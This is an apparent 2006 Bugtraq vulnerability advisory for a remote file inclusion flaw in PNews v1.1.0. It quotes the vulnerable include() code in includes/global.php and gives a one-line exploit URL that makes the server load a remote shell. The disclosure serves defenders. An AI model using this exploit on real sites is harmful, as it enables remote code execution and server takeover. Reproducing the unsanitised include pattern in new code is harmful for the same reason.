[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060921184829.15510.qmail@securityfocus.com>
Date: 21 Sep 2006 18:48:29 -0000
From: CvIr.System@...il.com
To: bugtraq@...urityfocus.com
Subject: PNews v1.1.0 (nbs) Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PNews v1.1.0 (nbs) Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Software..:PNews v1.1.0 download...:http://sourceforge.net/project/showfiles.php?group_id=35550
Class .............: Remote File Inclusion
Risk ..............: high
Found by ..........: CvIr.System
Contact ...........: CvIr.System[at]gmail.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
includes/global.php
Vulnerable Code:
if(@fopen($nbs .'./includes/config.php', 'a'))
{
die("config.php is writeable by your webserver, this is a possible security risk.");
}
include($nbs .'./includes/config.php');
include($nbs .'./includes/auth.php');
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://[target]/includes/global.php?nbs=[shell]?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Special GreetingS:_ANtrAX_|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Quetzal|Hanowars|xarnuz|Slappter|by_emR3|mnox|Malvinas|
Txis|The Shredder|FaLeNcE
Powered by blists - more mailing lists